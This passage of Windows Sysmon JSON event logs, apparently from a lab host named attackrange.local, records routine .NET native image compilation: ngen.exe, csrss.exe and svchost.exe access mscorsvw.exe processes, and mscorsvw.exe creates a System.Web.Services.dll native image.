ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6693,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:03.554\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C27B0A00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:03.554","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C27B0A00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6694,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:03.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F3-5F25-0000-0010C27B0A00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:03.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F3-5F25-0000-0010C27B0A00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6695,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:04.023\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F4-5F25-0000-0010FD7F0A00}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:04.023","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F4-5F25-0000-0010FD7F0A00}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6696,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:04.023\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F4-5F25-0000-0010FD7F0A00}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:04.023","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F4-5F25-0000-0010FD7F0A00}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6697,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:04.023\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F4-5F25-0000-0010FD7F0A00}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:04.023","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F4-5F25-0000-0010FD7F0A00}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6698,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:05.539\r\nProcessGuid: {41C8662E-21F4-5F25-0000-0010FD7F0A00}\r\nProcessId: 4028\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\fbc-0\\System.Web.Services.dll\r\nCreationUtcTime: 2020-08-01 08:04:05.539","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:05.539","ProcessGuid":"{41C8662E-21F4-5F25-0000-0010FD7F0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\fbc-0\\System.Web.Services.dll","CreationUtcTime":"2020-08-01 08:04:05.539","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6699,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.601\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010D2840A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.601","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010D2840A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6700,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.601\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010D2840A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.601","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010D2840A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6701,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-0010D2840A00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-0010D2840A00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
